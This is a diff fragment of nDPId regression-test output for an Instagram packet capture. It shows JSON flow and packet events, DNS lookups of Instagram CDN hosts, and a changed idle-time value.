+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1436720908518,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908518,"pkt":"QPMIw47hABsv8H60CABFAAA0kN9AAFUGV5QfDV00wKgAZwG7g+MQ445PobbjVYAQANn+UgAAAQEICvAgscMAA+57"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908521,"flow_last_seen":1436720908521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908521,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1436720908521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908521,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y1AAEAGBcbAqABnLiFGoJehAFBl4Bu99+Pb34ARFTc19wAAAQEICgAD7oGa3vT1"} 
+00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1436720908523,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908523,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICMgTADUANxLxN7ABAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAE="} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1436720908524,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908524,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICINDADUANycOb2MBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAE="} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908531,"flow_last_seen":1436720908531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908531,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1436720908531,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908531,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKZAAEAG2ADAqABnUlUaueJuAFA8SfXPvvA\/t4ARCm0uRAAAAQEICgAD7oJZ6tXr"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908531,"flow_last_seen":1436720908531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908531,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1436720908531,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908531,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKZAAEAG2ADAqABnUlUaueJuAFA8SfXPvvA\/t4ARCm0uRAAAAQEICgAD7oJZ6tXr"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1436720908533,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908533,"pkt":"ABsv8H60QPMIw47hCABFAABL7oJAAEARewDAqABnCAgICGesADUANyZVhbMBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAE="} 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"QPMIw47hABsv8H60CABFAAA0lYxAADkGdmcuIUagwKgAZwBQl6H349vfZeAbvoARAeZr3wAAAQEICprfXG4AA+6B"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y5AAEAGBcXAqABnLiFGoJehAFBl4Bu+9+Pb4IAQFTc19wAAAQEICgAD7oOa31xu"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"QPMIw47hABsv8H60CABFAAA0dopAADkGnRxSVRq5wKgAZwBQ4m6+8D+3PEn10IARAgj5iQAAAQEIClnq8RsAA+6C"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKdAAEAG1\/\/AqABnUlUaueJuAFA8SfXQvvA\/uIAQCm0uRAAAAQEICgAD7oVZ6vEb"} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"QPMIw47hABsv8H60CABFAAA0lYxAADkGdmcuIUagwKgAZwBQl6H349vfZeAbvoARAeZr3wAAAQEICprfXG4AA+6B"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y5AAEAGBcXAqABnLiFGoJehAFBl4Bu+9+Pb4IAQFTc19wAAAQEICgAD7oOa31xu"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"QPMIw47hABsv8H60CABFAAA0dopAADkGnRxSVRq5wKgAZwBQ4m6+8D+3PEn10IARAgj5iQAAAQEIClnq8RsAA+6C"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKdAAEAG1\/\/AqABnUlUaueJuAFA8SfXQvvA\/uIAQCm0uRAAAAQEICgAD7oVZ6vEb"} 
00792{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1436720908570,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":305,"pkt_l4_len":271,"thread_ts_msec":1436720908570,"pkt":"QPMIw47hABsv8H60CABFAAEjliwAADgRGn8ICAgIwKgAZwA1yBMBD5NUN7CBgAABAAoAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAZACoQaWdjZG4tcGhvdG9zLWgtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAADHJABYFYTE0MDgGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGrsBxAAEAAQAAABMABC4hRqHAcQABAAEAAAATAAQuIUawwHEAAQABAAAAEwAELiFGpsBxAAEAAQAAABMABC4hRo\/AcQABAAEAAAATAAQuIUagwHEAAQABAAAAEwAELiFGqcBxAAEAAQAAABMABC4hRrc="} 00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1436720908570,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.174"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908572,"flow_last_seen":1436720908572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908572,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1436720908572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908572,"pkt":"ABsv8H60QPMIw47hCABFAAA8iDpAAEAGfKPAqABnLiFGrq4OAbuyG2a8AAAAAKACOQg2DQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908572,"flow_last_seen":1436720908572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908572,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1436720908572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908572,"pkt":"ABsv8H60QPMIw47hCABFAAA8iDpAAEAGfKPAqABnLiFGrq4OAbuyG2a8AAAAAKACOQg2DQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1436720908575,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1436720908575,"pkt":"QPMIw47hABsv8H60CABFAADD9CwAADgRvN4ICAgIwKgAZwA1g0MAr7pub2OBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAhACoQaWdjZG4tcGhvdG9zLWEtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFRcABYFYTEwMDEGZHNwdzQwBmFrYW1hacAmwHEAAQABAAAAEwAEUlUamsBxAAEAAQAAABMABFJVGpk="} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908575,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.85.26.154"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908576,"flow_last_seen":1436720908576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908576,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1436720908576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908576,"pkt":"ABsv8H60QPMIw47hCABFAAA8nwVAAEAGbbjAqABnUlUamqDdAbvgTnGDAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908577,"flow_last_seen":1436720908577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908577,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1436720908577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908577,"pkt":"ABsv8H60QPMIw47hCABFAAA8GZtAAEAG8yLAqABnUlUamqDeAbviOvcdAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908576,"flow_last_seen":1436720908576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908576,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1436720908576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908576,"pkt":"ABsv8H60QPMIw47hCABFAAA8nwVAAEAGbbjAqABnUlUamqDdAbvgTnGDAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908577,"flow_last_seen":1436720908577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908577,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1436720908577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908577,"pkt":"ABsv8H60QPMIw47hCABFAAA8GZtAAEAG8yLAqABnUlUamqDeAbviOvcdAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1436720908579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1436720908579,"pkt":"QPMIw47hABsv8H60CABFAADD9DAAADgRvNoICAgIwKgAZwA1Z6wAr0GdhbOBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAA3ACoQaWdjZG4tcGhvdG9zLWctYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFQ9ABYFYTEwMDcGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGiMBxAAEAAQAAABMABC4hRo4="} 
00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908579,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.136"}} 